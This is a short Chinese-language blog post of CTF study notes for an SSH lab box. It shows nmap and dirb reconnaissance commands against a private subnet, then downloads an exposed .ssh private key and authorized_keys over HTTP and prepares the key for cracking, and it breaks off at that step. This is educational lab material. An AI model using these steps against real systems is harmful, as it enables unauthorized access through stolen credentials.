CTF学习笔记

CTF 学习笔记

ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
nmap -sP 192.168.0.0/24		#扫描网段存活IP
nmap -sV 192.168.0.0/24 #扫描存活端口
#通过开放的可疑端口(将服务运行在非常规的端口上)访问,查看源代码看是否有有用信息

dirb http://192.168.0.7:31337 #探测隐藏文件
#探测出相关影藏文件后对可疑文件进行分析
#robots文件 记录禁止被探测的文件,通过该文件内容能找到一些重要文件
#.ssh文件 记录ssh秘钥信息,通常id_rsd代表私钥(可用来认证ssh登录),authorized_keys代表认证信息(能从中找用户名等信息)),id_rsa.pub代表公钥
#ssh是一钟远程加密登录协议,通常是用于远程管理计算机使用,ssh可通过口令登录,也可通过秘钥登录

#通过.ssh文件猜猜存在秘钥文件
#获得秘钥文件
#http://192.168.0.7:31337/.ssh/id_rsa
#http://192.168.0.7:31337/.ssh/authorized_keys
#给私钥修改权限
chmod 600 id_rsa
#破解私钥信息
-------------本文结束感谢阅读-------------

欢迎关注我的其它发布渠道